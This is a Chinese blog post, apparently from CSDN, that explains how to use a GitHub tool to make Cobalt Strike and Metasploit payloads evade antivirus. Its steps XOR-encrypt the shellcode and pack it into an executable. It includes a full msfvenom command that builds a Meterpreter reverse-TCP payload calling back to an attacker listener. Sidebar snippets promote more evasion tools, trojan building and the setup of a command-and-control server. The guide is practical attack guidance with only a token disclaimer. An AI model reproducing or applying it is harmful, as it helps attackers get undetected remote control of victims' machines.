Cobalt Strike 和 MSF 免杀上线

最新推荐文章于 2024-06-02 13:13:06 发布
最新推荐文章于 2024-06-02 13:13:06 发布
阅读量1.6k 收藏 6
点赞数 1
分类专栏: 工具使用 文章标签: 免杀 Cobalt Strike MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/113499224
版权

一、项目

老哥们,方便的话,给个star吧!
BypassAV
VT查杀效果良好!!!
在这里插入图片描述

大家可以去github上 git下来使用,这里就介绍下具体使用

二、操作

2.1 CS 上线

1、生成 C 语言格式的payload  payload.c
(使用前,最好先测试下生成的payload是否可用!这里推荐k8gege的shellcodeLoader工具)
坑:选择 x64 经常无法上线!!!

在这里插入图片描述

2、利用 Filehandle.py 处理 shellcode
替换自己的shellcode文件路径——>执行即可

在这里插入图片描述

3、替换 ver.py 里的shellcode变量值 为 第2步的结果

在这里插入图片描述

4、执行 ver.py 文件 在 output 目录下会有个launch.exe文件

在这里插入图片描述

2.2 MSF上线

1、生成 py格式的payload
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.47.147 lport=4444 -b '\x00' -f python -o payload.py

2、利用 Filehandle.py 处理 shellcode
替换自己的shellcode文件路径——>执行即可

。。。步骤与CS上线一样

在这里插入图片描述

三、补充

ver.py 里的 两个 key 是 异或加密密钥,自己也可以更改!

在这里插入图片描述

【申明:此项目仅供学习参考,不可用于非法途径,否则一切后果,由恶意使用者个人承担!】

初学者L_言
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
lza20001103的博客
09-04 2332
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载器七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
从零开始学安全(三十八)●cobaltstrike生成木马抓肉鸡
weixin_30709061的博客
03-26 1803
链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih 上面是工具 需要java jdk 在1.8.5 以上 实验环境windows 在K8_CS_3.12\cobaltstrike 目录下允许cmd 在cmd 执行 TeamServer.exe 192.168.11.247 你的密码 回车 点击Cobal...
cobalt strike木马免杀
xf555er的博客
05-02 9714
0x001-针对powershell免杀 工具:Invoke-Obfuscation 操作实例: 1、利用CS生成powershell木马 2、进入invoke-Obsfuscation文件,使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件,成功上线 0x002 -针对可执行程序(.exe)的免杀 工具:shellter 1、进入shellt...
Cobalt_Strike(CS)渗透工具安装使用到免杀上线
最新发布
qq_47289634的博客
06-02 412
接着写一段C代码,对加密后的shellcode进行解密并执行,注意后缀是.c,不是.cpp它们是不一样的。把生成的exe文件放到虚拟机执行之后一样上线,这样要注意把加密后的shellcode也要放入虚拟机。上面代码运行之后会在当前文件夹下生成一个bin文件,记住这个文件的位置,这里我把它放到了E盘下面。记得关闭杀软,不然会被删,把生成的exe文件放到目标主机双击,即可上线cs。vt过60,一大半了,对于刚接触免杀的我来说,已经不错了。这里代码有很多是我方便调试写的,可以去掉那些打印的。
kali下打开cobaltstrike
m0_74290869的博客
07-04 1086
2,cd 进入cs所在的文件夹中(我的是在Desktop中)5,不要关闭此终端,再打开一个终端(命令如图,进入服务)./teamserver kali的ip 密码(自定)3, 获取对此文件操作的最高权限。1,将cs文件夹放在kali中。
Cobaltstrike安装,免杀,使用
逆向萌新的博客
07-06 1291
Cobaltstrike安装,免杀,使用
BadUSB简单免杀一秒上线CobaltStrike.pdf
03-24
BadUSB简单免杀一秒上线CobaltStrike.pdf
Cobalt Strike(十五)使用多种方法免杀 payload
qq_56426046的博客
09-26 1325
hanzoijection是一个工具,它专注于在内存中注入任意代码,以绕过常见的防病毒解决方案下载地址。
《Python绝技:运用Python成为顶级黑客》 用Python实现免杀
weixin_30746117的博客
05-28 352
1、免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。 输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 查看该c文件: 接着在...
Cobalt Strike靶机上线
梳碧湖的砍柴人
01-18 529
环境搭建 服务器端:Kali 客户端:Win10 靶机:Win7 注意:CS基于java环境,首先安装java,jdk1.8 查看安装列表:yum -y list java* 安装java环境-1.8的:yum instal java-1.8.0-openjdk-demo.x86_64 CS安装 安装后显示 赋予 teamserver 执行权限 chmod +x teamsercer 运行方式:服务端ip,并且设置连接密码 ./teamserver 192.168.1.123 133438 wi
Colbalt文件说明
07-31
Colbalt文件说明,, README文档
最新免杀360全套,无提示上线免杀世界杀毒网!!
12-18
最新免杀360全套
Cobalt_Strike_beacon免杀上线com_劫持1
08-03
第一步,既然是劫持 com,首先肯定得先有个 dll 才行,因为目标是 64 位系统,所以,我们此处在创建好监听器以后,直接生 第二步,将 dll payloa
CobaltStrike4.4.zip
09-15
Cobalt Strike是一款备受瞩目的渗透测试工具,主要用于模拟高级威胁行为,帮助网络安全专业人士进行红队操作和评估网络防御的有效性。在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关...
cobaltstrike中文版.zip
05-17
Cobalt Strike是一款高级的渗透测试工具,广泛用于模拟攻击和红队操作,以评估组织的安全防御能力。它由Mandiant公司开发,主要用于企业安全团队进行威胁模拟、漏洞利用和持续性威胁(APT)模拟。这个“cobaltstrike...
cobalt strike 4.7
06-07
Cobalt Strike 4.7版本中,用户可以期待一系列增强和更新,旨在提升效率和隐蔽性。以下是一些关键知识点: 1. ** Beacon 模块**:Beacon是Cobalt Strike的核心组件,它是一个内存中的代理,负责与C2服务器通信并...
Colbalt Strike之CHM木马
浅笑996的博客
11-15 1236
一、命令执行(calc)木马生成 1.生成木马 首先创建一个根目录,文件名为exp 在文件夹里创建两个目录和一个index.html文件 在两个目录里分别创建txt文件或html文件 index.html写入以下内容 <!DOCTYPE html><html><head><title>Mousejack replay&amp
CobaltStrike(钓鱼攻击工具)
F2444790591的博客
02-10 3997
一、介绍 (1)Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作,服务端:1个,客户端:N个。 (2)Cobalt Strike集成了功能和模块:端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成。 二、使用(Cobaltstrike4.0) 1、Cobaltstrike 服务端的启动。 (1)开启Cobalt............
Cobalt Strike 免杀 python
07-20
对于 Cobalt Strike免杀技术,目前有很多方法可以实现。以下是一种使用 Python 的方法: 1. 首先,使用 Python 的 PyInstaller 或者 Py2exe 等工具将 Cobalt Strike 的主程序进行打包成可执行文件。 2. 接下来,可以使用 PyArmor 或者 Cython 等工具对可执行文件进行加密和混淆,增加反编译难度。 3. 使用 Pyinstaller 的 --onefile 参数,将所有依赖库打包到一个单独的可执行文件中,减少被杀软件检测到的可能性。 4. 通过修改 Cobalt Strike 的代码,或者使用其他的代码混淆工具进行代码混淆,使其难以被静态分析。 5. 可以使用 Shellcode 或者 Reflective DLL Injection 等技术将 Cobalt Strike 主程序加载到内存中运行,避免在磁盘上留下可疑的文件。 6. 可以使用加壳工具对 Cobalt Strike 进行加壳,增加静态分析和动态分析的难度。 需要注意的是,免杀技术并不能保证绝对的免杀效果,因为杀软厂商会不断更新他们的规则和算法。因此,保持及时更新和使用多种免杀技术组合的方法是更可靠的选择。同时,请遵守法律法规,合法使用相关技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值